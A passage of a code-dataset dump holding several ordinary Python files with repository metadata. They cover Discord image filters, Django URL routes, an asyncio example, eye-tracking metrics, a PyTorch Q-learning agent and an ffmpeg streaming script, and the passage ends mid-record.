image\n\n\ndef glitch(image):\n w, h = image.width, image.height\n image = image.resize((int(w ** .75), int(h ** .75)), resample=Image.LANCZOS)\n image = image.resize((int(w ** .88), int(h ** .88)), resample=Image.BILINEAR)\n image = image.resize((int(w ** .9), int(h ** .9)), resample=Image.BICUBIC)\n image = image.resize((w, h), resample=Image.BICUBIC)\n try:\n alpha = image.getchannel('A')\n except ValueError:\n alpha = None\n image = image.convert(\"RGB\")\n image = ImageOps.posterize(image, 4)\n if alpha:\n image.putalpha(alpha)\n image = ImageEnhance.Sharpness(image).enhance(100.0)\n return image\n\n\ndef edges(image):\n try:\n alpha = image.getchannel('A')\n except ValueError:\n alpha = None\n image = image.filter(ImageFilter.SMOOTH)\n image = image.filter(ImageFilter.CONTOUR)\n image = image.convert(\"RGB\")\n image = ImageOps.invert(image)\n image = ImageOps.grayscale(image)\n image = image.convert(\"RGBA\")\n if alpha:\n image.putalpha(alpha)\n return image\n\n\ndef rotate(image, rotation='right'):\n if rotation == 'left':\n return image.transpose(Image.ROTATE_90)\n else:\n return image.transpose(Image.ROTATE_270)\n\n\ndef transparent(image):\n image = image.convert(\"RGBA\")\n alpha = image.getchannel('A')\n p = 0\n for (r, g, b, a) in image.getdata():\n if abs(r-g) + abs(g-b) < 10:\n x = p % alpha.width\n y = p // alpha.width\n if a > 255 - min(r, g, b):\n alpha.putpixel((x, y), 255 - min(r, g, b))\n p += 1\n image.putalpha(alpha)\n return image\n\n\ndef grayscale(image):\n try:\n alpha = image.getchannel('A')\n except ValueError:\n alpha = None\n image = ImageOps.grayscale(image)\n image = image.convert(\"RGBA\")\n if alpha:\n image.putalpha(alpha)\n return image\n\n\nfilters = {\n 'blur': blur,\n 'invert': invert,\n 'flipv': flipv,\n 'fliph': fliph,\n 'posterize': posterize,\n 'glitch': glitch,\n 'edges': edges,\n 'transparent': transparent,\n 'grayscale': grayscale,\n}\n\nadvanced_filters = {\n 'symm': symm,\n 'shrink': shrink,\n 'rotate': rotate,\n}\n\n\nclass Filters(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n\n\n @commands.command(aliases=list(filters))\n async def filter(self, ctx):\n filter_name = ctx.invoked_with\n if filter_name == 'filter':\n return\n image, image_message = await get_image(ctx)\n if not image:\n return\n\n image = filters[filter_name](image)\n\n await send_image(ctx, image, image_message)\n\n\n @commands.command()\n async def symm(self, ctx, side: str = \"left\"):\n side = side.lower()\n if side not in ('left', 'right', 'top', 'bottom'):\n return await ctx.send(\"Valid sides are 'left', 'right', 'top', and 'bottom'.\")\n image, image_message = await get_image(ctx)\n if not image:\n return\n\n w, h = image.size\n if side == 'left':\n crop = image.crop((0, 0, w//2, h))\n crop = ImageOps.mirror(crop)\n image.paste(crop, (round(w / 2 + 0.1), 0))\n elif side == 'right':\n crop = image.crop((round(w / 2 + 0.1), 0, w, h))\n crop = ImageOps.mirror(crop)\n image.paste(crop, (0, 0))\n elif side == 'top':\n crop = image.crop((0, 0, w, h//2))\n crop = ImageOps.flip(crop)\n image.paste(crop, (0, round(h / 2 + 0.1)))\n elif side == 'bottom':\n crop = image.crop((0, round(h / 2 + 0.1), w, h))\n crop = ImageOps.flip(crop)\n image.paste(crop, (0, 0))\n\n await send_image(ctx, image, image_message)\n\n\n @commands.command()\n async def shrink(self, ctx, per: int = 5):\n if not (1 <= per <= 99):\n return await ctx.send(\"Percentage must be between 1 and 99\")\n image, image_message = await get_image(ctx)\n if not image:\n return\n image = image.convert(\"RGBA\")\n w = image.width * per // 100\n h = image.height * per // 100\n image = image.resize((w, h), resample=Image.LANCZOS)\n\n await send_image(ctx, image, image_message)\n\n\n @commands.command()\n async def rotate(self, ctx, rotation: str = 'right'):\n rotation = rotation.lower()\n if rotation not in ('left', 'right'):\n return await ctx.send(\"Rotation must be 'left' or 'right'.\")\n image, image_message = await get_image(ctx)\n if not image:\n return\n\n if rotation == 'left':\n image = image.transpose(Image.ROTATE_90)\n else:\n image = image.transpose(Image.ROTATE_270)\n\n await send_image(ctx, image, image_message)\n\n\n @commands.command()\n async def impact(self, ctx, *, text: str):\n image, image_message = await get_image(ctx)\n if not image:\n return\n\n font_size = image.width // 10\n try:\n font = ImageFont.truetype(font=\"fonts/impact.ttf\", size=font_size)\n except IOError:\n return await ctx.send(\"Couldn't open the font.\")\n draw = ImageDraw.Draw(image)\n text = wrap_text(draw, font, text, image.width)\n text_size = draw.textsize(text, font)\n x, y = ((image.width - text_size[0]) // 2, 3)\n\n radius = font_size // 20\n draw.text((x-radius, y-radius), text, font=font, fill=(0, 0, 0, 255), align=\"center\")\n draw.text((x-radius, y+radius), text, font=font, fill=(0, 0, 0, 255), align=\"center\")\n draw.text((x+radius, y-radius), text, font=font, fill=(0, 0, 0, 255), align=\"center\")\n draw.text((x+radius, y+radius), text, font=font, fill=(0, 0, 0, 255), align=\"center\")\n\n draw.text((x, y), text, font=font, align=\"center\")\n\n await send_image(ctx, image, image_message)\n\n\ndef setup(bot):\n bot.add_cog(Filters(bot))\n", "repo_name": "Nickneim/discord-monarchbot", "sub_path": "cogs/filters.py", "file_name": "filters.py", "file_ext": "py", "file_size_in_byte": 8607, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "PIL.ImageFilter.BLUR", "line_number": 38, "usage_type": "attribute"}, {"api_name": "PIL.ImageFilter", "line_number": 38, "usage_type": "name"}, {"api_name": "PIL.ImageOps.invert", "line_number": 47, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 47, "usage_type": "name"}, {"api_name": "PIL.ImageOps.flip", "line_number": 54, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 54, "usage_type": "name"}, {"api_name": "PIL.ImageOps.mirror", "line_number": 58, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 58, "usage_type": "name"}, {"api_name": "PIL.ImageOps.mirror", "line_number": 65, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 65, "usage_type": "name"}, {"api_name": "PIL.ImageOps.mirror", "line_number": 69, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 69, "usage_type": "name"}, {"api_name": "PIL.ImageOps.flip", "line_number": 73, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 73, "usage_type": "name"}, {"api_name": "PIL.ImageOps.flip", "line_number": 77, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 77, "usage_type": "name"}, {"api_name": "PIL.ImageOps.posterize", "line_number": 88, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 88, "usage_type": "name"}, {"api_name": "PIL.Image.LANCZOS", "line_number": 98, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 98, "usage_type": "name"}, {"api_name": "PIL.Image.LANCZOS", "line_number": 104, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 104, "usage_type": "name"}, {"api_name": "PIL.Image.BILINEAR", "line_number": 105, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 105, "usage_type": "name"}, {"api_name": "PIL.Image.BICUBIC", "line_number": 106, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 106, "usage_type": "name"}, {"api_name": "PIL.Image.BICUBIC", "line_number": 107, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 107, "usage_type": "name"}, {"api_name": "PIL.ImageOps.posterize", "line_number": 113, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 113, "usage_type": "name"}, {"api_name": "PIL.ImageEnhance.Sharpness", "line_number": 116, "usage_type": "call"}, {"api_name": "PIL.ImageEnhance", "line_number": 116, "usage_type": "name"}, {"api_name": "PIL.ImageFilter.SMOOTH", "line_number": 125, "usage_type": "attribute"}, {"api_name": "PIL.ImageFilter", "line_number": 125, "usage_type": "name"}, {"api_name": "PIL.ImageFilter.CONTOUR", "line_number": 126, "usage_type": "attribute"}, {"api_name": "PIL.ImageFilter", "line_number": 126, "usage_type": "name"}, {"api_name": "PIL.ImageOps.invert", "line_number": 128, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 128, "usage_type": "name"}, {"api_name": "PIL.ImageOps.grayscale", "line_number": 129, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 129, "usage_type": "name"}, {"api_name": "PIL.Image.ROTATE_90", "line_number": 138, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 138, "usage_type": "name"}, {"api_name": "PIL.Image.ROTATE_270", "line_number": 140, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 140, "usage_type": "name"}, {"api_name": "PIL.ImageOps.grayscale", "line_number": 163, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 163, "usage_type": "name"}, {"api_name": "discord.ext.commands.Cog", "line_number": 189, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 189, "usage_type": "name"}, {"api_name": "image_handling.get_image", "line_number": 200, "usage_type": "call"}, {"api_name": "image_handling.send_image", "line_number": 206, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 195, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 195, "usage_type": "name"}, {"api_name": "image_handling.get_image", "line_number": 214, "usage_type": "call"}, {"api_name": "PIL.ImageOps.mirror", "line_number": 221, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 221, "usage_type": "name"}, {"api_name": "PIL.ImageOps.mirror", "line_number": 225, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 225, "usage_type": "name"}, {"api_name": "PIL.ImageOps.flip", "line_number": 229, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 229, "usage_type": "name"}, {"api_name": "PIL.ImageOps.flip", "line_number": 233, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 233, "usage_type": "name"}, {"api_name": "image_handling.send_image", "line_number": 236, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 209, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 209, "usage_type": "name"}, {"api_name": "image_handling.get_image", "line_number": 243, "usage_type": "call"}, {"api_name": "PIL.Image.LANCZOS", "line_number": 249, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 249, "usage_type": "name"}, {"api_name": "image_handling.send_image", "line_number": 251, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 239, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 239, "usage_type": "name"}, {"api_name": "image_handling.get_image", "line_number": 259, "usage_type": "call"}, {"api_name": "PIL.Image.ROTATE_90", "line_number": 264, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 264, "usage_type": "name"}, {"api_name": "PIL.Image.ROTATE_270", "line_number": 266, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 266, "usage_type": "name"}, {"api_name": "image_handling.send_image", "line_number": 268, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 254, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 254, "usage_type": "name"}, {"api_name": "image_handling.get_image", "line_number": 273, "usage_type": "call"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 279, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 279, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 282, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 282, "usage_type": "name"}, {"api_name": "image_handling.send_image", "line_number": 295, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 271, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 271, "usage_type": "name"}]} +{"seq_id": "22473132756", "text": "\"\"\"\nBase urlpatterns.\n\"\"\"\n\n# Django\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.urls import path, include\n\n\nurlpatterns = [\n # Admin\n path(\n 'admin/doc/',\n include('django.contrib.admindocs.urls')\n ),\n\n path(\n 'admin/',\n admin.site.urls\n ),\n\n # UI\n path(\n '',\n include(\n ('ui.urls', 'ui'),\n namespace='ui'\n )\n ),\n\n # Services\n path(\n 'services/',\n include(\n ('api.services.urls', 'services'),\n namespace='services'\n )\n ),\n\n # Auths\n path(\n 'auth/',\n include(\n ('api.auths.urls', 'auth'),\n namespace='auth'\n )\n )\n\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n# Handle request errors\nhandler400 = 'back.views.handler400'\n\nhandler403 = 'back.views.handler403'\n\nhandler404 = 'back.views.handler404'\n", "repo_name": "ignite7/backproject", "sub_path": "back/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 993, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 16, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 21, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 27, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 34, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 36, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 43, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 45, "usage_type": "call"}, {"api_name": "django.conf.urls.static.static", "line_number": 51, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 51, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 51, "usage_type": "name"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 51, "usage_type": "attribute"}]} +{"seq_id": "38782358148", "text": "import asyncio\nfrom typing import List, Iterable, Awaitable\n\nfrom faker import Faker\n\n\nfrom timing import async_timed\n\nfake = Faker('uk-UA')\n\n\nasync def async_get_user_from_fake_db(uuid: int):\n await asyncio.sleep(0.5)\n return {'id': uuid, 'name': fake.name(), 'email': fake.email()}\n\n\ndef get_users(uuids: List[int]) -> Iterable[Awaitable]:\n return [async_get_user_from_fake_db(uuid) for uuid in uuids]\n\n\n@async_timed()\nasync def main(users: Iterable[Awaitable]):\n return await asyncio.gather(*users)\n\n\nif __name__ == '__main__':\n r = asyncio.run(main(get_users([1, 2, 3])))\n print(r)\n", "repo_name": "GoIT-Python-Web/Py10Web", "sub_path": "m10_05_02/01_async_for.py", "file_name": "01_async_for.py", "file_ext": "py", "file_size_in_byte": 604, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "52", "api": [{"api_name": "faker.Faker", "line_number": 9, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 13, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 17, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 17, "usage_type": "name"}, {"api_name": "typing.Awaitable", "line_number": 17, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 22, "usage_type": "name"}, {"api_name": "typing.Awaitable", "line_number": 22, "usage_type": "name"}, {"api_name": "asyncio.gather", "line_number": 23, "usage_type": "call"}, {"api_name": "timing.async_timed", "line_number": 21, "usage_type": "call"}, {"api_name": "asyncio.run", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "39314921483", "text": "from mongo_connection import Mongo_connection\nimport numpy as np\nimport pandas as pd\nimport pair_transition_analysis\nimport granger_causation_test\nfrom matplotlib import pyplot as plt\nfrom collections import defaultdict\nimport roi_config\nimport fixation\nimport hypothesis_testing\n\n\nmongo = Mongo_connection()\nmongo.connect()\n\ndef get_basic_metrics(df_fixation):\n d = {}\n d[\"fixation_mean_duration\"] = df_fixation[\"duration\"].mean()\n d[\"fixation_rate\"] = len(df_fixation)/df_fixation[\"end\"].values[-1]*1000/60\n d[\"saccade_amplitude\"] = np.sqrt(np.diff(df_fixation[\"x\"])**2 + np.diff(df_fixation[\"y\"])**2).mean()\n d[\"saccade_mean_duration\"] = np.mean(df_fixation[\"start\"].values[1:] - df_fixation[\"end\"].values[:-1])\n \n return d\n\ndef create_transition_matrix(transitions):\n m = pd.crosstab(pd.Series(list(transitions)[1:], name = \"t+1\"),\n pd.Series(list(transitions)[:-1], name = \"t\"),normalize=1)\n \n return m\n\ndef calculate_entropy(transitions):\n if len(transitions) == 0:\n return 0, 0\n# transitions = replace_repeated_character(transitions)\n\n trans_matrix = create_transition_matrix(transitions)\n m = {}\n for c in trans_matrix.columns:\n m[c] = trans_matrix[c].tolist()\n\n Hs = 0\n Ht = 0\n pA = {c:len(np.where(np.array(list(transitions))==c)[0])/len(transitions) for c in list(set(transitions))}\n\n for k,v in pA.items():\n Hs += -1 * np.nan_to_num(v*np.log2(v))\n Ht += -sum(pA[k]*(np.nan_to_num(m[k]*np.log2(m[k]))))\n \n return Hs, Ht\n\ndef get_advanced_metrics(df_fixation):\n d = {}\n transitions, L = pair_transition_analysis.encode_transition(df_fixation[\"roi\"])\n Hs, Ht = calculate_entropy(transitions)\n d[\"Hs\"] = Hs\n d[\"Ht\"] = Ht\n \n return d\n\n\ndef get_dwell_stat(df_data):\n agg_sum = df_data.groupby([\"roi\"]).agg({'duration': 'sum'})\n agg_sum_percent = agg_sum/sum(agg_sum['duration'])\n agg_mean = df_data.groupby([\"roi\"]).agg({'duration': 'mean'})\n agg_var = df_data.groupby([\"roi\"]).agg({'duration': 'var'})\n agg_fixrate = df_data.groupby([\"roi\"]).agg({'duration': 'count'})/df_data.iloc[-1][\"end\"]*1000/60\n \n list_roi = list(set(df_data[\"roi\"]))\n d = {}\n for roi in list_roi:\n d[\"duration_{}\".format(roi)] = agg_sum.loc[roi][0]\n d[\"duration_percentage_{}\".format(roi)] = agg_sum_percent.loc[roi][0]\n d[\"duration_average_{}\".format(roi)] = agg_mean.loc[roi][0]\n d[\"duration_var_{}\".format(roi)] = agg_var.loc[roi][0]\n d[\"fix_rate_{}\".format(roi)] = agg_fixrate.loc[roi][0]\n \n# df_data = fixation.merge_consecutive_fixations_in_same_roi(df_data)\n \n# df_runway = df_data[df_data[\"roi\"]==\"runway\"]\n# duration_in_between_runway = df_runway[\"start\"].values[1:] - df_runway[\"end\"].values[:-1]\n# n_transition_in_between_runway = np.diff(df_runway.index) - 1\n# d[\"between_runway_mean_duration_all\"] = np.mean(duration_in_between_runway/n_transition_in_between_runway)\n \n# n_trans = list(set(n_transition_in_between_runway))\n# for n in range(1,4):\n# d[\"between_runway_n_trans_{}\".format(n)] = sum(n_transition_in_between_runway==n)\n# d[\"between_runway_mean_duration_{}\".format(n)] = np.mean(duration_in_between_runway[np.where(n_transition_in_between_runway == n)])\n\n return d\n\ndef run_dwell_stats(cmd):\n documents = mongo.find(cmd)\n d = defaultdict(list)\n for document in documents:\n print(\"trial: {}, group: {}, pID: {}\".format(document[\"trial\"], document[\"group\"], document[\"pID\"]))\n if document[\"trial\"] == 4:\n continue\n \n d['pID'].append(document[\"pID\"])\n d['group'].append(document[\"group\"])\n d['trial'].append(document[\"trial\"])\n d['rating'].append(document[\"rating\"])\n \n \n d[\"null_percent\"].append(document[\"null_percent\"])\n # d[\"calibration\"].append(document[\"calibration\"])\n d_data = document[\"data\"]\n df_data = pd.DataFrame(d_data)\n \n d_dwell = get_dwell_stat(df_data)\n for k in roi_config.encode_table.keys():\n d[\"duration_{}\".format(k)].append(d_dwell.get(\"duration_{}\".format(k), 0))\n d[\"duration_percentage_{}\".format(k)].append(d_dwell.get(\"duration_percentage_{}\".format(k), 0))\n d[\"duration_average_{}\".format(k)].append(d_dwell.get(\"duration_average_{}\".format(k), 0))\n d[\"fix_rate_{}\".format(k)].append(d_dwell.get(\"fix_rate_{}\".format(k), 0))\n \n # for k in d_dwell.keys():\n # if \"between_runway\" in str(k):\n # d[k].append(d_dwell.get(k, 0))\n df_dwell = pd.DataFrame(d).sort_values([\"pID\",\"trial\", \"group\",\"rating\"]).dropna().reset_index().drop(columns=[\"index\"])\n return df_dwell\n\ndef run_basic_metrics(cmd):\n documents = mongo.find(cmd)\n d = defaultdict(list)\n for document in documents:\n print(\"trial: {}, group: {}, pID: {}\".format(document[\"trial\"], document[\"group\"], document[\"pID\"]))\n if document[\"trial\"] == 4:\n continue\n\n d['pID'].append(document[\"pID\"])\n d['group'].append(document[\"group\"])\n d['trial'].append(document[\"trial\"])\n \n d[\"null_percent\"].append(document[\"null_percent\"])\n # d[\"calibration\"].append(document[\"calibration\"])\n d_data = document[\"data\"]\n df_data = pd.DataFrame(d_data)\n transitions, L = pair_transition_analysis.encode_transition(df_data[\"roi\"])\n \n basic_metrics = get_basic_metrics(df_data)\n advance_metrics = get_advanced_metrics(df_data)\n \n d[\"fixation_mean_duration\"].append(basic_metrics[\"fixation_mean_duration\"])\n d[\"fixation_rate\"].append(basic_metrics[\"fixation_rate\"])\n d[\"saccade_amplitude\"].append(basic_metrics[\"saccade_amplitude\"])\n d[\"saccade_mean_duration\"].append(basic_metrics[\"saccade_mean_duration\"])\n \n # d[\"Hs\"].append(advance_metrics[\"Hs\"])\n # d[\"Ht\"].append(advance_metrics[\"Ht\"])\n\n # for ngram_length in range(3,7):\n # subseqcount = defaultdict(dict)\n\n # for i in range(len(transitions)-ngram_length + 1):\n # substring = transitions[i:i+ngram_length]\n # if subseqcount[substring].get(\"count\"):\n # subseqcount[substring][\"count\"] += 1\n # subseqcount[substring][\"duration\"] += df_data.iloc[i:i+ngram_length][\"duration\"].sum()\n # else:\n # subseqcount[substring][\"count\"] = 1\n # subseqcount[substring][\"duration\"] = df_data.iloc[i:i+ngram_length][\"duration\"].sum()\n\n # sorted_subseqcount = {k: v for k, v in sorted(subseqcount.items(), key=lambda item: item[1][\"count\"], reverse=True)}\n # more_than_2_time_seq = {k: v for k, v in subseqcount.items() if v[\"count\"] >= 2}\n # count_of_most_seq = 0\n # N_unique_seq = 0\n # print(sorted_subseqcount)\n # if len(subseqcount.values())>0:\n # count_of_most_seq = max(subseqcount.values())/sum(subseqcount.values())\n # N_unique_seq = len(subseqcount.keys())\n \n # N_unique_seq_more_than_2_times = 0\n # if len(more_than_2_time_seq.values())>0:\n # N_unique_seq_more_than_2_times = len(more_than_2_time_seq.keys())\n \n # d[\"N_unique_seq_{}\".format(ngram_length)].append(N_unique_seq)\n # d[\"count_of_most_seq_{}\".format(ngram_length)].append(count_of_most_seq)\n # d[\"N_unique_seq_more_than_2_times_{}\".format(ngram_length)].append(N_unique_seq_more_than_2_times)\n # d[\"mean_repetition_{}\".format(ngram_length)].append(np.mean(list(more_than_2_time_seq.values())))\n\n\n df_res = pd.DataFrame(d).sort_values([\"pID\",\"trial\", \"group\",\"rating\"]).dropna().reset_index().drop(columns=[\"index\"])\n return df_res\n \n", "repo_name": "habom2310/eye-tracking-in-aviation", "sub_path": "bulk_run.py", "file_name": "bulk_run.py", "file_ext": "py", "file_size_in_byte": 7933, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "mongo_connection.Mongo_connection", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 21, "usage_type": "call"}, {"api_name": "pandas.crosstab", "line_number": 26, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 26, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.nan_to_num", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.log2", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.nan_to_num", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.log2", "line_number": 47, "usage_type": "call"}, {"api_name": "pair_transition_analysis.encode_transition", "line_number": 53, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 93, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 108, "usage_type": "call"}, {"api_name": "roi_config.encode_table.keys", "line_number": 111, "usage_type": "call"}, {"api_name": "roi_config.encode_table", "line_number": 111, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 120, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 125, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 138, "usage_type": "call"}, {"api_name": "pair_transition_analysis.encode_transition", "line_number": 139, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 183, "usage_type": "call"}]} +{"seq_id": "9741319724", "text": "import torch\nimport torch.nn.functional as Funcional\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom Memory import Memory\nfrom Network import Network\nimport os\n\nclass Ai():\n \n def __init__(self, inputSize, nbAction, gamma):\n self.gamma = gamma\n self.rewardWindow = []\n self.model = Network(inputSize, nbAction)\n self.memory = Memory(1000)\n self.optimizer = optim.Adam(self.model.parameters(), lr = 0.001)\n self.lastState = torch.Tensor(inputSize).unsqueeze(0)\n self.lastAction = 0\n self.lastReward = 0\n \n def _selectAction(self, state):\n probs = Funcional.softmax(self.model(Variable(state))*100) \n action = probs.multinomial(1)\n return action.data[0,0]\n \n def _learn(self, batchState, batchNextState, batchReward, batchAction):\n outputs = self.model(batchState).gather(1, batchAction.unsqueeze(1)).squeeze(1)\n nextOutputs = self.model(batchNextState).detach().max(1)[0]\n target = self.gamma * nextOutputs + batchReward\n tdLoss = Funcional.smooth_l1_loss(outputs, target)\n self.optimizer.zero_grad()\n tdLoss.backward()\n self.optimizer.step()\n \n def update(self, reward, newSignal):\n newState = torch.Tensor(newSignal).float().unsqueeze(0)\n self.memory.update((self.lastState, newState, torch.LongTensor([int(self.lastAction)]), torch.Tensor([self.lastReward])))\n action = self._selectAction(newState)\n if len(self.memory.memory) > 100:\n batchState, batchNextState, batchAction, batchReward = self.memory.sample(100)\n self._learn(batchState, batchNextState, batchReward, batchAction)\n self.lastAction = action\n self.lastState = newState\n self.lastReward = reward\n self.rewardWindow.append(reward)\n if len(self.rewardWindow) > 1000:\n del self.rewardWindow[0]\n\n return action\n \n def score(self):\n return sum(self.rewardWindow)/(len(self.rewardWindow)+1.)\n\n def save(self):\n torch.save({'state': self.model.state_dict(), 'opti' : self.optimizer.state_dict()}, 'save.pth')\n \n def load(self):\n if os.path.isfile('save.pth'):\n checkpoint = torch.load('save.pth')\n self.model.load_state_dict(checkpoint['state'])\n self.optimizer.load_state_dict(checkpoint['opti'])\n ", "repo_name": "Gabski/simulator", "sub_path": "Ai.py", "file_name": "Ai.py", "file_ext": "py", "file_size_in_byte": 2405, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "Network.Network", "line_number": 14, "usage_type": "call"}, {"api_name": "Memory.Memory", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.autograd.Variable", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn.functional.smooth_l1_loss", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 30, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "73229022245", "text": "# -*- coding: utf-8 -*-\n# @Time: 2023/2/5 19:46\n# @FileName: Stream.py\n# @Software: PyCharm\n# @GitHub: KimmyXYC\nimport os\nimport time\nimport subprocess\nfrom loguru import logger\n\n\ndef streaming(live_addr, live_code, config):\n stream_type = config[\"type\"]\n video_path = config[\"video_path\"]\n live_time = config[\"live_time\"]\n if stream_type == 1:\n for root, dirs, files in os.walk(video_path):\n if live_time == 0:\n for file in files:\n logger.info(f\"即将直播: {file}\")\n ffmpeg_run(live_addr, live_code, os.path.join(root, file))\n elif live_time == -1:\n while True:\n for file in files:\n logger.info(f\"即将直播: {file}\")\n ffmpeg_run(live_addr, live_code, os.path.join(root, file))\n else:\n start_time = time.time()\n end_time = start_time + live_time\n while time.time() < end_time:\n for file in files:\n logger.info(f\"即将直播: {file}\")\n ffmpeg_run(live_addr, live_code, os.path.join(root, file))\n if time.time() >= end_time:\n break\n else:\n if live_time != 0 and live_time != -1:\n start_time = time.time()\n end_time = start_time + live_time\n while time.time() < end_time:\n ffmpeg_run(live_addr, live_code, video_path)\n elif live_time == 0:\n ffmpeg_run(live_addr, live_code, video_path)\n else:\n while True:\n ffmpeg_run(live_addr, live_code, video_path)\n\n\ndef ffmpeg_run(live_addr, live_code, video_path):\n cmd = f'ffmpeg -re -i {video_path} -c copy -f flv \"{live_addr}{live_code}\" -flvflags no_duration_filesize'\n p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\n p.wait()\n output, error = p.communicate()\n logger.debug((output.decode()))\n", "repo_name": 